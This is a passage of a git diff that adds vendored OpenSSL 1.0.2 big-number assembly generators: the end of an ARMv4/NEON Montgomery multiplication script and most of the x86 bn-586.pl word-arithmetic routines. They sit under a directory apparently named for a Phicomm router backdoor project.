+	 subs		$inner,$inner,#8
+	vmlal.u32	$A2xB,$Ni,${N1}[0]
+	vmlal.u32	$A3xB,$Ni,${N1}[1]
+	vst1.64		{$A0xB-$A1xB}, [$toutptr,:256]!
+
+	vmlal.u32	$A4xB,$Ni,${N2}[0]
+	 vld1.64	{$A0xB},       [$tinptr, :128]!
+	vmlal.u32	$A5xB,$Ni,${N2}[1]
+	vst1.64		{$A2xB-$A3xB}, [$toutptr,:256]!
+	vmlal.u32	$A6xB,$Ni,${N3}[0]
+	 vld1.64	{$A1xB-$A2xB}, [$tinptr, :256]!
+	vmlal.u32	$A7xB,$Ni,${N3}[1]
+	vst1.64		{$A4xB-$A5xB}, [$toutptr,:256]!
+
+	vmlal.u32	$A0xB,$Bi,${A0}[0]
+	 vld1.64	{$A3xB-$A4xB}, [$tinptr, :256]!
+	vmlal.u32	$A1xB,$Bi,${A0}[1]
+	vst1.64		{$A6xB-$A7xB}, [$toutptr,:256]!
+	vmlal.u32	$A2xB,$Bi,${A1}[0]
+	 vld1.64	{$A5xB-$A6xB}, [$tinptr, :256]!
+	vmlal.u32	$A3xB,$Bi,${A1}[1]
+	 vld1.32	{$N0-$N3}, [$nptr]!
+
+	vmlal.u32	$A4xB,$Bi,${A2}[0]
+	 vld1.64	{$A7xB},       [$tinptr, :128]!
+	vmlal.u32	$A5xB,$Bi,${A2}[1]
+	vmlal.u32	$A6xB,$Bi,${A3}[0]
+	vmlal.u32	$A7xB,$Bi,${A3}[1]
+
+	bne	.LNEON_inner
+
+	vmlal.u32	$A0xB,$Ni,${N0}[0]
+	add		$tinptr,sp,#16
+	vmlal.u32	$A1xB,$Ni,${N0}[1]
+	sub		$aptr,$aptr,$num,lsl#2		@ rewind $aptr
+	vmlal.u32	$A2xB,$Ni,${N1}[0]
+	 vld1.64	{$Temp}, [sp,:128]
+	vmlal.u32	$A3xB,$Ni,${N1}[1]
+	subs		$outer,$outer,#1
+
+	vmlal.u32	$A4xB,$Ni,${N2}[0]
+	vst1.64		{$A0xB-$A1xB}, [$toutptr,:256]!
+	vmlal.u32	$A5xB,$Ni,${N2}[1]
+	 vld1.64	{$A0xB},       [$tinptr, :128]!
+	vshr.u64	$temp,$temp,#16
+	vst1.64		{$A2xB-$A3xB}, [$toutptr,:256]!
+	vmlal.u32	$A6xB,$Ni,${N3}[0]
+	 vld1.64	{$A1xB-$A2xB}, [$tinptr, :256]!
+	vmlal.u32	$A7xB,$Ni,${N3}[1]
+
+	vst1.64		{$A4xB-$A5xB}, [$toutptr,:256]!
+	vadd.u64	$temp,$temp,`&Dhi("$Temp")`
+	vst1.64		{$A6xB-$A7xB}, [$toutptr,:256]!
+	vshr.u64	$temp,$temp,#16
+
+	bne	.LNEON_outer
+
+	mov		$toutptr,sp
+	mov		$inner,$num
+
+.LNEON_tail:
+	vadd.u64	`&Dlo("$A0xB")`,`&Dlo("$A0xB")`,$temp
+	vld1.64		{$A3xB-$A4xB}, [$tinptr, :256]!
+	vshr.u64	$temp,`&Dlo("$A0xB")`,#16
+	vadd.u64	`&Dhi("$A0xB")`,`&Dhi("$A0xB")`,$temp
+	vld1.64		{$A5xB-$A6xB}, [$tinptr, :256]!
+	vshr.u64	$temp,`&Dhi("$A0xB")`,#16
+	vld1.64		{$A7xB},       [$tinptr, :128]!
+	vzip.16		`&Dlo("$A0xB")`,`&Dhi("$A0xB")`
+
+.LNEON_tail2:
+	vadd.u64	`&Dlo("$A1xB")`,`&Dlo("$A1xB")`,$temp
+	vst1.32		{`&Dlo("$A0xB")`[0]}, [$toutptr, :32]!
+	vshr.u64	$temp,`&Dlo("$A1xB")`,#16
+	vadd.u64	`&Dhi("$A1xB")`,`&Dhi("$A1xB")`,$temp
+	vshr.u64	$temp,`&Dhi("$A1xB")`,#16
+	vzip.16		`&Dlo("$A1xB")`,`&Dhi("$A1xB")`
+
+	vadd.u64	`&Dlo("$A2xB")`,`&Dlo("$A2xB")`,$temp
+	vst1.32		{`&Dlo("$A1xB")`[0]}, [$toutptr, :32]!
+	vshr.u64	$temp,`&Dlo("$A2xB")`,#16
+	vadd.u64	`&Dhi("$A2xB")`,`&Dhi("$A2xB")`,$temp
+	vshr.u64	$temp,`&Dhi("$A2xB")`,#16
+	vzip.16		`&Dlo("$A2xB")`,`&Dhi("$A2xB")`
+
+	vadd.u64	`&Dlo("$A3xB")`,`&Dlo("$A3xB")`,$temp
+	vst1.32		{`&Dlo("$A2xB")`[0]}, [$toutptr, :32]!
+	vshr.u64	$temp,`&Dlo("$A3xB")`,#16
+	vadd.u64	`&Dhi("$A3xB")`,`&Dhi("$A3xB")`,$temp
+	vshr.u64	$temp,`&Dhi("$A3xB")`,#16
+	vzip.16		`&Dlo("$A3xB")`,`&Dhi("$A3xB")`
+
+	vadd.u64	`&Dlo("$A4xB")`,`&Dlo("$A4xB")`,$temp
+	vst1.32		{`&Dlo("$A3xB")`[0]}, [$toutptr, :32]!
+	vshr.u64	$temp,`&Dlo("$A4xB")`,#16
+	vadd.u64	`&Dhi("$A4xB")`,`&Dhi("$A4xB")`,$temp
+	vshr.u64	$temp,`&Dhi("$A4xB")`,#16
+	vzip.16		`&Dlo("$A4xB")`,`&Dhi("$A4xB")`
+
+	vadd.u64	`&Dlo("$A5xB")`,`&Dlo("$A5xB")`,$temp
+	vst1.32		{`&Dlo("$A4xB")`[0]}, [$toutptr, :32]!
+	vshr.u64	$temp,`&Dlo("$A5xB")`,#16
+	vadd.u64	`&Dhi("$A5xB")`,`&Dhi("$A5xB")`,$temp
+	vshr.u64	$temp,`&Dhi("$A5xB")`,#16
+	vzip.16		`&Dlo("$A5xB")`,`&Dhi("$A5xB")`
+
+	vadd.u64	`&Dlo("$A6xB")`,`&Dlo("$A6xB")`,$temp
+	vst1.32		{`&Dlo("$A5xB")`[0]}, [$toutptr, :32]!
+	vshr.u64	$temp,`&Dlo("$A6xB")`,#16
+	vadd.u64	`&Dhi("$A6xB")`,`&Dhi("$A6xB")`,$temp
+	vld1.64		{$A0xB}, [$tinptr, :128]!
+	vshr.u64	$temp,`&Dhi("$A6xB")`,#16
+	vzip.16		`&Dlo("$A6xB")`,`&Dhi("$A6xB")`
+
+	vadd.u64	`&Dlo("$A7xB")`,`&Dlo("$A7xB")`,$temp
+	vst1.32		{`&Dlo("$A6xB")`[0]}, [$toutptr, :32]!
+	vshr.u64	$temp,`&Dlo("$A7xB")`,#16
+	vadd.u64	`&Dhi("$A7xB")`,`&Dhi("$A7xB")`,$temp
+	vld1.64		{$A1xB-$A2xB},	[$tinptr, :256]!
+	vshr.u64	$temp,`&Dhi("$A7xB")`,#16
+	vzip.16		`&Dlo("$A7xB")`,`&Dhi("$A7xB")`
+	subs		$inner,$inner,#8
+	vst1.32		{`&Dlo("$A7xB")`[0]}, [$toutptr, :32]!
+
+	bne	.LNEON_tail
+
+	vst1.32	{${temp}[0]}, [$toutptr, :32]		@ top-most bit
+	sub	$nptr,$nptr,$num,lsl#2			@ rewind $nptr
+	subs	$aptr,sp,#0				@ clear carry flag
+	add	$bptr,sp,$num,lsl#2
+
+.LNEON_sub:
+	ldmia	$aptr!, {r4-r7}
+	ldmia	$nptr!, {r8-r11}
+	sbcs	r8, r4,r8
+	sbcs	r9, r5,r9
+	sbcs	r10,r6,r10
+	sbcs	r11,r7,r11
+	teq	$aptr,$bptr				@ preserves carry
+	stmia	$rptr!, {r8-r11}
+	bne	.LNEON_sub
+
+	ldr	r10, [$aptr]				@ load top-most bit
+	veor	q0,q0,q0
+	sub	r11,$bptr,sp				@ this is num*4
+	veor	q1,q1,q1
+	mov	$aptr,sp
+	sub	$rptr,$rptr,r11				@ rewind $rptr
+	mov	$nptr,$bptr				@ second 3/4th of frame
+	sbcs	r10,r10,#0				@ result is carry flag
+
+.LNEON_copy_n_zap:
+	ldmia	$aptr!, {r4-r7}
+	ldmia	$rptr,  {r8-r11}
+	movcc	r8, r4
+	vst1.64	{q0-q1}, [$nptr,:256]!			@ wipe
+	movcc	r9, r5
+	movcc	r10,r6
+	vst1.64	{q0-q1}, [$nptr,:256]!			@ wipe
+	movcc	r11,r7
+	ldmia	$aptr, {r4-r7}
+	stmia	$rptr!, {r8-r11}
+	sub	$aptr,$aptr,#16
+	ldmia	$rptr, {r8-r11}
+	movcc	r8, r4
+	vst1.64	{q0-q1}, [$aptr,:256]!			@ wipe
+	movcc	r9, r5
+	movcc	r10,r6
+	vst1.64	{q0-q1}, [$nptr,:256]!			@ wipe
+	movcc	r11,r7
+	teq	$aptr,$bptr				@ preserves carry
+	stmia	$rptr!, {r8-r11}
+	bne	.LNEON_copy_n_zap
+
+	sub	sp,ip,#96
+        vldmia  sp!,{d8-d15}
+        ldmia   sp!,{r4-r11}
+	ret						@ bx lr
+.size	bn_mul8x_mont_neon,.-bn_mul8x_mont_neon
+#endif
+___
+}
+$code.=<<___;
+.asciz	"Montgomery multiplication for ARMv4/NEON, CRYPTOGAMS by <appro\@openssl.org>"
+.align	2
+#if __ARM_MAX_ARCH__>=7
+.comm	OPENSSL_armcap_P,4,4
+#endif
+___
+
+$code =~ s/\`([^\`]*)\`/eval $1/gem;
+$code =~ s/\bbx\s+lr\b/.word\t0xe12fff1e/gm;	# make it possible to compile with -march=armv4
+$code =~ s/\bret\b/bx	lr/gm;
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/bn-586.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/bn-586.pl
new file mode 100644
index 0000000..332ef3e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/bn-586.pl
@@ -0,0 +1,774 @@
+#!/usr/local/bin/perl
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+push(@INC,"${dir}","${dir}../../perlasm");
+require "x86asm.pl";
+
+&asm_init($ARGV[0],$0);
+
+$sse2=0;
+for (@ARGV) { $sse2=1 if (/-DOPENSSL_IA32_SSE2/); }
+
+&external_label("OPENSSL_ia32cap_P") if ($sse2);
+
+&bn_mul_add_words("bn_mul_add_words");
+&bn_mul_words("bn_mul_words");
+&bn_sqr_words("bn_sqr_words");
+&bn_div_words("bn_div_words");
+&bn_add_words("bn_add_words");
+&bn_sub_words("bn_sub_words");
+&bn_sub_part_words("bn_sub_part_words");
+
+&asm_finish();
+
+sub bn_mul_add_words
+	{
+	local($name)=@_;
+
+	&function_begin_B($name,$sse2?"EXTRN\t_OPENSSL_ia32cap_P:DWORD":"");
+
+	$r="eax";
+	$a="edx";
+	$c="ecx";
+
+	if ($sse2) {
+		&picmeup("eax","OPENSSL_ia32cap_P");
+		&bt(&DWP(0,"eax"),26);
+		&jnc(&label("maw_non_sse2"));
+
+		&mov($r,&wparam(0));
+		&mov($a,&wparam(1));
+		&mov($c,&wparam(2));
+		&movd("mm0",&wparam(3));	# mm0 = w
+		&pxor("mm1","mm1");		# mm1 = carry_in
+		&jmp(&label("maw_sse2_entry"));
+		
+	&set_label("maw_sse2_unrolled",16);
+		&movd("mm3",&DWP(0,$r,"",0));	# mm3 = r[0]
+		&paddq("mm1","mm3");		# mm1 = carry_in + r[0]
+		&movd("mm2",&DWP(0,$a,"",0));	# mm2 = a[0]
+		&pmuludq("mm2","mm0");		# mm2 = w*a[0]
+		&movd("mm4",&DWP(4,$a,"",0));	# mm4 = a[1]
+		&pmuludq("mm4","mm0");		# mm4 = w*a[1]
+		&movd("mm6",&DWP(8,$a,"",0));	# mm6 = a[2]
+		&pmuludq("mm6","mm0");		# mm6 = w*a[2]
+		&movd("mm7",&DWP(12,$a,"",0));	# mm7 = a[3]
+		&pmuludq("mm7","mm0");		# mm7 = w*a[3]
+		&paddq("mm1","mm2");		# mm1 = carry_in + r[0] + w*a[0]
+		&movd("mm3",&DWP(4,$r,"",0));	# mm3 = r[1]
+		&paddq("mm3","mm4");		# mm3 = r[1] + w*a[1]
+		&movd("mm5",&DWP(8,$r,"",0));	# mm5 = r[2]
+		&paddq("mm5","mm6");		# mm5 = r[2] + w*a[2]
+		&movd("mm4",&DWP(12,$r,"",0));	# mm4 = r[3]
+		&paddq("mm7","mm4");		# mm7 = r[3] + w*a[3]
+		&movd(&DWP(0,$r,"",0),"mm1");
+		&movd("mm2",&DWP(16,$a,"",0));	# mm2 = a[4]
+		&pmuludq("mm2","mm0");		# mm2 = w*a[4]
+		&psrlq("mm1",32);		# mm1 = carry0
+		&movd("mm4",&DWP(20,$a,"",0));	# mm4 = a[5]
+		&pmuludq("mm4","mm0");		# mm4 = w*a[5]
+		&paddq("mm1","mm3");		# mm1 = carry0 + r[1] + w*a[1]
+		&movd("mm6",&DWP(24,$a,"",0));	# mm6 = a[6]
+		&pmuludq("mm6","mm0");		# mm6 = w*a[6]
+		&movd(&DWP(4,$r,"",0),"mm1");
+		&psrlq("mm1",32);		# mm1 = carry1
+		&movd("mm3",&DWP(28,$a,"",0));	# mm3 = a[7]
+		&add($a,32);
+		&pmuludq("mm3","mm0");		# mm3 = w*a[7]
+		&paddq("mm1","mm5");		# mm1 = carry1 + r[2] + w*a[2]
+		&movd("mm5",&DWP(16,$r,"",0));	# mm5 = r[4]
+		&paddq("mm2","mm5");		# mm2 = r[4] + w*a[4]
+		&movd(&DWP(8,$r,"",0),"mm1");
+		&psrlq("mm1",32);		# mm1 = carry2
+		&paddq("mm1","mm7");		# mm1 = carry2 + r[3] + w*a[3]
+		&movd("mm5",&DWP(20,$r,"",0));	# mm5 = r[5]
+		&paddq("mm4","mm5");		# mm4 = r[5] + w*a[5]
+		&movd(&DWP(12,$r,"",0),"mm1");
+		&psrlq("mm1",32);		# mm1 = carry3
+		&paddq("mm1","mm2");		# mm1 = carry3 + r[4] + w*a[4]
+		&movd("mm5",&DWP(24,$r,"",0));	# mm5 = r[6]
+		&paddq("mm6","mm5");		# mm6 = r[6] + w*a[6]
+		&movd(&DWP(16,$r,"",0),"mm1");
+		&psrlq("mm1",32);		# mm1 = carry4
+		&paddq("mm1","mm4");		# mm1 = carry4 + r[5] + w*a[5]
+		&movd("mm5",&DWP(28,$r,"",0));	# mm5 = r[7]
+		&paddq("mm3","mm5");		# mm3 = r[7] + w*a[7]
+		&movd(&DWP(20,$r,"",0),"mm1");
+		&psrlq("mm1",32);		# mm1 = carry5
+		&paddq("mm1","mm6");		# mm1 = carry5 + r[6] + w*a[6]
+		&movd(&DWP(24,$r,"",0),"mm1");
+		&psrlq("mm1",32);		# mm1 = carry6
+		&paddq("mm1","mm3");		# mm1 = carry6 + r[7] + w*a[7]
+		&movd(&DWP(28,$r,"",0),"mm1");
+		&lea($r,&DWP(32,$r));
+		&psrlq("mm1",32);		# mm1 = carry_out
+
+		&sub($c,8);
+		&jz(&label("maw_sse2_exit"));
+	&set_label("maw_sse2_entry");
+		&test($c,0xfffffff8);
+		&jnz(&label("maw_sse2_unrolled"));
+
+	&set_label("maw_sse2_loop",4);
+		&movd("mm2",&DWP(0,$a));	# mm2 = a[i]
+		&movd("mm3",&DWP(0,$r));	# mm3 = r[i]
+		&pmuludq("mm2","mm0");		# a[i] *= w
+		&lea($a,&DWP(4,$a));
+		&paddq("mm1","mm3");		# carry += r[i]
+		&paddq("mm1","mm2");		# carry += a[i]*w
+		&movd(&DWP(0,$r),"mm1");	# r[i] = carry_low
+		&sub($c,1);
+		&psrlq("mm1",32);		# carry = carry_high
+		&lea($r,&DWP(4,$r));
+		&jnz(&label("maw_sse2_loop"));
+	&set_label("maw_sse2_exit");
+		&movd("eax","mm1");		# c = carry_out
+		&emms();
+		&ret();
+
+	&set_label("maw_non_sse2",16);
+	}
+
+	# function_begin prologue
+	&push("ebp");
+	&push("ebx");
+	&push("esi");
+	&push("edi");
+
+	&comment("");
+	$Low="eax";
+	$High="edx";
+	$a="ebx";
+	$w="ebp";
+	$r="edi";
+	$c="esi";
+
+	&xor($c,$c);		# clear carry
+	&mov($r,&wparam(0));	#
+
+	&mov("ecx",&wparam(2));	#
+	&mov($a,&wparam(1));	#
+
+	&and("ecx",0xfffffff8);	# num / 8
+	&mov($w,&wparam(3));	#
+
+	&push("ecx");		# Up the stack for a tmp variable
+
+	&jz(&label("maw_finish"));
+
+	&set_label("maw_loop",16);
+
+	for ($i=0; $i<32; $i+=4)
+		{
+		&comment("Round $i");
+
+		 &mov("eax",&DWP($i,$a)); 	# *a
+		&mul($w);			# *a * w
+		&add("eax",$c);			# L(t)+= c
+		&adc("edx",0);			# H(t)+=carry
+		 &add("eax",&DWP($i,$r));	# L(t)+= *r
+		&adc("edx",0);			# H(t)+=carry
+		 &mov(&DWP($i,$r),"eax");	# *r= L(t);
+		&mov($c,"edx");			# c=  H(t);
+		}
+
+	&comment("");
+	&sub("ecx",8);
+	&lea($a,&DWP(32,$a));
+	&lea($r,&DWP(32,$r));
+	&jnz(&label("maw_loop"));
+
+	&set_label("maw_finish",0);
+	&mov("ecx",&wparam(2));	# get num
+	&and("ecx",7);
+	&jnz(&label("maw_finish2"));	# helps branch prediction
+	&jmp(&label("maw_end"));
+
+	&set_label("maw_finish2",1);
+	for ($i=0; $i<7; $i++)
+		{
+		&comment("Tail Round $i");
+		 &mov("eax",&DWP($i*4,$a));	# *a
+		&mul($w);			# *a * w
+		&add("eax",$c);			# L(t)+=c
+		&adc("edx",0);			# H(t)+=carry
+		 &add("eax",&DWP($i*4,$r));	# L(t)+= *r
+		&adc("edx",0);			# H(t)+=carry
+		 &dec("ecx") if ($i != 7-1);
+		&mov(&DWP($i*4,$r),"eax");	# *r= L(t);
+		 &mov($c,"edx");		# c=  H(t);
+		&jz(&label("maw_end")) if ($i != 7-1);
+		}
+	&set_label("maw_end",0);
+	&mov("eax",$c);
+
+	&pop("ecx");	# clear variable from
+
+	&function_end($name);
+	}
+
+sub bn_mul_words
+	{
+	local($name)=@_;
+
+	&function_begin_B($name,$sse2?"EXTRN\t_OPENSSL_ia32cap_P:DWORD":"");
+
+	$r="eax";
+	$a="edx";
+	$c="ecx";
+
+	if ($sse2) {
+		&picmeup("eax","OPENSSL_ia32cap_P");
+		&bt(&DWP(0,"eax"),26);
+		&jnc(&label("mw_non_sse2"));
+
+		&mov($r,&wparam(0));
+		&mov($a,&wparam(1));
+		&mov($c,&wparam(2));
+		&movd("mm0",&wparam(3));	# mm0 = w
+		&pxor("mm1","mm1");		# mm1 = carry = 0
+
+	&set_label("mw_sse2_loop",16);
+		&movd("mm2",&DWP(0,$a));	# mm2 = a[i]
+		&pmuludq("mm2","mm0");		# a[i] *= w
+		&lea($a,&DWP(4,$a));
+		&paddq("mm1","mm2");		# carry += a[i]*w
+		&movd(&DWP(0,$r),"mm1");	# r[i] = carry_low
+		&sub($c,1);
+		&psrlq("mm1",32);		# carry = carry_high
+		&lea($r,&DWP(4,$r));
+		&jnz(&label("mw_sse2_loop"));
+
+		&movd("eax","mm1");		# return carry
+		&emms();
+		&ret();
+	&set_label("mw_non_sse2",16);
+	}
+
+	# function_begin prologue
+	&push("ebp");
+	&push("ebx");
+	&push("esi");
+	&push("edi");
+
+	&comment("");
+	$Low="eax";
+	$High="edx";
+	$a="ebx";
+	$w="ecx";
+	$r="edi";
+	$c="esi";
+	$num="ebp";
+
+	&xor($c,$c);		# clear carry
+	&mov($r,&wparam(0));	#
+	&mov($a,&wparam(1));	#
+	&mov($num,&wparam(2));	#
+	&mov($w,&wparam(3));	#
+
+	&and($num,0xfffffff8);	# num / 8
+	&jz(&label("mw_finish"));
+
+	&set_label("mw_loop",0);
+	for ($i=0; $i<32; $i+=4)
+		{
+		&comment("Round $i");
+
+		 &mov("eax",&DWP($i,$a,"",0)); 	# *a
+		&mul($w);			# *a * w
+		&add("eax",$c);			# L(t)+=c
+		 # XXX
+
+		&adc("edx",0);			# H(t)+=carry
+		 &mov(&DWP($i,$r,"",0),"eax");	# *r= L(t);
+
+		&mov($c,"edx");			# c=  H(t);
+		}
+
+	&comment("");
+	&add($a,32);
+	&add($r,32);
+	&sub($num,8);
+	&jz(&label("mw_finish"));
+	&jmp(&label("mw_loop"));
+
+	&set_label("mw_finish",0);
+	&mov($num,&wparam(2));	# get num
+	&and($num,7);
+	&jnz(&label("mw_finish2"));
+	&jmp(&label("mw_end"));
+
+	&set_label("mw_finish2",1);
+	for ($i=0; $i<7; $i++)
+		{
+		&comment("Tail Round $i");
+		 &mov("eax",&DWP($i*4,$a,"",0));# *a
+		&mul($w);			# *a * w
+		&add("eax",$c);			# L(t)+=c
+		 # XXX
+		&adc("edx",0);			# H(t)+=carry
+		 &mov(&DWP($i*4,$r,"",0),"eax");# *r= L(t);
+		&mov($c,"edx");			# c=  H(t);
+		 &dec($num) if ($i != 7-1);
+		&jz(&label("mw_end")) if ($i != 7-1);
+		}
+	&set_label("mw_end",0);
+	&mov("eax",$c);
+
+	&function_end($name);
+	}
+
+sub bn_sqr_words
+	{
+	local($name)=@_;
+
+	&function_begin_B($name,$sse2?"EXTRN\t_OPENSSL_ia32cap_P:DWORD":"");
+
+	$r="eax";
+	$a="edx";
+	$c="ecx";
+
+	if ($sse2) {
+		&picmeup("eax","OPENSSL_ia32cap_P");
+		&bt(&DWP(0,"eax"),26);
+		&jnc(&label("sqr_non_sse2"));
+
+		&mov($r,&wparam(0));
+		&mov($a,&wparam(1));
+		&mov($c,&wparam(2));
+
+	&set_label("sqr_sse2_loop",16);
+		&movd("mm0",&DWP(0,$a));	# mm0 = a[i]
+		&pmuludq("mm0","mm0");		# a[i] *= a[i]
+		&lea($a,&DWP(4,$a));		# a++
+		&movq(&QWP(0,$r),"mm0");	# r[i] = a[i]*a[i]
+		&sub($c,1);
+		&lea($r,&DWP(8,$r));		# r += 2
+		&jnz(&label("sqr_sse2_loop"));
+
+		&emms();
+		&ret();
+	&set_label("sqr_non_sse2",16);
+	}
+
+	# function_begin prologue
+	&push("ebp");
+	&push("ebx");
+	&push("esi");
+	&push("edi");
+
+	&comment("");
+	$r="esi";
+	$a="edi";
+	$num="ebx";
+
+	&mov($r,&wparam(0));	#
+	&mov($a,&wparam(1));	#
+	&mov($num,&wparam(2));	#
+
+	&and($num,0xfffffff8);	# num / 8
+	&jz(&label("sw_finish"));
+
+	&set_label("sw_loop",0);
+	for ($i=0; $i<32; $i+=4)
+		{
+		&comment("Round $i");
+		&mov("eax",&DWP($i,$a,"",0)); 	# *a
+		 # XXX
+		&mul("eax");			# *a * *a
+		&mov(&DWP($i*2,$r,"",0),"eax");	#
+		 &mov(&DWP($i*2+4,$r,"",0),"edx");#
+		}
+
+	&comment("");
+	&add($a,32);
+	&add($r,64);
+	&sub($num,8);
+	&jnz(&label("sw_loop"));
+
+	&set_label("sw_finish",0);
+	&mov($num,&wparam(2));	# get num
+	&and($num,7);
+	&jz(&label("sw_end"));
+
+	for ($i=0; $i<7; $i++)
+		{
+		&comment("Tail Round $i");
+		&mov("eax",&DWP($i*4,$a,"",0));	# *a
+		 # XXX
+		&mul("eax");			# *a * *a
+		&mov(&DWP($i*8,$r,"",0),"eax");	#
+		 &dec($num) if ($i != 7-1);
+		&mov(&DWP($i*8+4,$r,"",0),"edx");
+		 &jz(&label("sw_end")) if ($i != 7-1);
+		}
+	&set_label("sw_end",0);
+
+	&function_end($name);
+	}
+
+sub bn_div_words
+	{
+	local($name)=@_;
+
+	&function_begin_B($name,"");
+	&mov("edx",&wparam(0));	#
+	&mov("eax",&wparam(1));	#
+	&mov("ecx",&wparam(2));	#
+	&div("ecx");
+	&ret();
+	&function_end_B($name);
+	}
+
+sub bn_add_words
+	{
+	local($name)=@_;
+
+	&function_begin($name,"");
+
+	&comment("");
+	$a="esi";
+	$b="edi";
+	$c="eax";
+	$r="ebx";
+	$tmp1="ecx";
+	$tmp2="edx";
+	$num="ebp";
+
+	&mov($r,&wparam(0));	# get r
+	 &mov($a,&wparam(1));	# get a
+	&mov($b,&wparam(2));	# get b
+	 &mov($num,&wparam(3));	# get num
+	&xor($c,$c);		# clear carry
+	 &and($num,0xfffffff8);	# num / 8
+
+	&jz(&label("aw_finish"));
+
+	&set_label("aw_loop",0);
+	for ($i=0; $i<8; $i++)
+		{
+		&comment("Round $i");
+
+		&mov($tmp1,&DWP($i*4,$a,"",0)); 	# *a
+		 &mov($tmp2,&DWP($i*4,$b,"",0)); 	# *b
+		&add($tmp1,$c);
+		 &mov($c,0);
+		&adc($c,$c);
+		 &add($tmp1,$tmp2);
+		&adc($c,0);
+		 &mov(&DWP($i*4,$r,"",0),$tmp1); 	# *r
+		}
+
+	&comment("");
+	&add($a,32);
+	 &add($b,32);
+	&add($r,32);
+	 &sub($num,8);
+	&jnz(&label("aw_loop"));
+
+	&set_label("aw_finish",0);
+	&mov($num,&wparam(3));	# get num
+	&and($num,7);
+	 &jz(&label("aw_end"));
+
+	for ($i=0; $i<7; $i++)
+		{
+		&comment("Tail Round $i");
+		&mov($tmp1,&DWP($i*4,$a,"",0));	# *a
+		 &mov($tmp2,&DWP($i*4,$b,"",0));# *b
+		&add($tmp1,$c);
+		 &mov($c,0);
+		&adc($c,$c);
+		 &add($tmp1,$tmp2);
+		&adc($c,0);
+		 &dec($num) if ($i != 6);
+		&mov(&DWP($i*4,$r,"",0),$tmp1);	# *r
+		 &jz(&label("aw_end")) if ($i != 6);
+		}
+	&set_label("aw_end",0);
+
+#	&mov("eax",$c);		# $c is "eax"
+
+	&function_end($name);
+	}
+
+sub bn_sub_words
+	{
+	local($name)=@_;
+
+	&function_begin($name,"");
+
+	&comment("");
+	$a="esi";
+	$b="edi";
+	$c="eax";
+	$r="ebx";
+	$tmp1="ecx";
+	$tmp2="edx";
+	$num="ebp";
+
+	&mov($r,&wparam(0));	# get r
+	 &mov($a,&wparam(1));	# get a
+	&mov($b,&wparam(2));	# get b
+	 &mov($num,&wparam(3));	# get num
+	&xor($c,$c);		# clear carry
+	 &and($num,0xfffffff8);	# num / 8
+
+	&jz(&label("aw_finish"));
+
+	&set_label("aw_loop",0);
+	for ($i=0; $i<8; $i++)
+		{
+		&comment("Round $i");
+
+		&mov($tmp1,&DWP($i*4,$a,"",0)); 	# *a
+		 &mov($tmp2,&DWP($i*4,$b,"",0)); 	# *b
+		&sub($tmp1,$c);
+		 &mov($c,0);
+		&adc($c,$c);
+		 &sub($tmp1,$tmp2);
+		&adc($c,0);
+		 &mov(&DWP($i*4,$r,"",0),$tmp1); 	# *r
+		}
+
+	&comment("");
+	&add($a,32);
+	 &add($b,32);
+	&add($r,32);
+	 &sub($num,8);
+	&jnz(&label("aw_loop"));
+
+	&set_label("aw_finish",0);
+	&mov($num,&wparam(3));	# get num
+	&and($num,7);
+	 &jz(&label("aw_end"));
+
+	for ($i=0; $i<7; $i++)
+		{
+		&comment("Tail Round $i");
+		&mov($tmp1,&DWP($i*4,$a,"",0));	# *a
+		 &mov($tmp2,&DWP($i*4,$b,"",0));# *b
+		&sub($tmp1,$c);
+		 &mov($c,0);
+		&adc($c,$c);
+		 &sub($tmp1,$tmp2);
+		&adc($c,0);
+		 &dec($num) if ($i != 6);
+		&mov(&DWP($i*4,$r,"",0),$tmp1);	# *r
+		 &jz(&label("aw_end")) if ($i != 6);
+		}
+	&set_label("aw_end",0);
+
+#	&mov("eax",$c);		# $c is "eax"
+
+	&function_end($name);
+	}
+
+sub bn_sub_part_words
+	{
+	local($name)=@_;
+
+	&function_begin($name,"");
+
+	&comment("");
+	$a="esi";
+	$b="edi";
+	$c="eax";
+	$r="ebx";
+	$tmp1="ecx";
+	$tmp2="edx";
+	$num="ebp";
+
+	&mov($r,&wparam(0));	# get r
+	 &mov($a,&wparam(1));	# get a
+	&mov($b,&wparam(2));	# get b
+	 &mov($num,&wparam(3));	# get num
+	&xor($c,$c);		# clear carry
+	 &and($num,0xfffffff8);	# num / 8
+
+	&jz(&label("aw_finish"));
+
+	&set_label("aw_loop",0);
+	for ($i=0; $i<8; $i++)
+		{
+		&comment("Round $i");
+
+		&mov($tmp1,&DWP($i*4,$a,"",0)); 	# *a
+		 &mov($tmp2,&DWP($i*4,$b,"",0)); 	# *b
+		&sub($tmp1,$c);
+		 &mov($c,0);
+		&adc($c,$c);
+		 &sub($tmp1,$tmp2);
+		&adc($c,0);
+		 &mov(&DWP($i*4,$r,"",0),$tmp1); 	# *r
+		}
+
+	&comment("");
+	&add($a,32);
+	 &add($b,32);
+	&add($r,32);
+	 &sub($num,8);
+	&jnz(&label("aw_loop"));
+
+	&set_label("aw_finish",0);
+	&mov($num,&wparam(3));	# get num
+	&and($num,7);
+	 &jz(&label("aw_end"));
+
+	for ($i=0; $i<7; $i++)
+		{
+		&comment("Tail Round $i");
+		&mov($tmp1,&DWP(0,$a,"",0));	# *a
+		 &mov($tmp2,&DWP(0,$b,"",0));# *b
+		&sub($tmp1,$c);
+		 &mov($c,0);
+		&adc($c,$c);
+		 &sub($tmp1,$tmp2);
+		&adc($c,0);
+		&mov(&DWP(0,$r,"",0),$tmp1);	# *r
+		&add($a, 4);
+		&add($b, 4);
+		&add($r, 4);
+		 &dec($num) if ($i != 6);
+		 &jz(&label("aw_end")) if ($i != 6);
+		}
+	&set_label("aw_end",0);
+
+	&cmp(&wparam(4),0);
+	&je(&label("pw_end"));
+
+	&mov($num,&wparam(4));	# get dl
+	&cmp($num,0);
+	&je(&label("pw_end"));
+	&jge(&label("pw_pos"));
+
+	&comment("pw_neg");
+	&mov($tmp2,0);
+	&sub($tmp2,$num);
+	&mov($num,$tmp2);
+	&and($num,0xfffffff8);	# num / 8
+	&jz(&label("pw_neg_finish"));
+
+	&set_label("pw_neg_loop",0);
+	for ($i=0; $i<8; $i++)
+	{
+	    &comment("dl<0 Round $i");
+
+	    &mov($tmp1,0);
+	    &mov($tmp2,&DWP($i*4,$b,"",0)); 	# *b
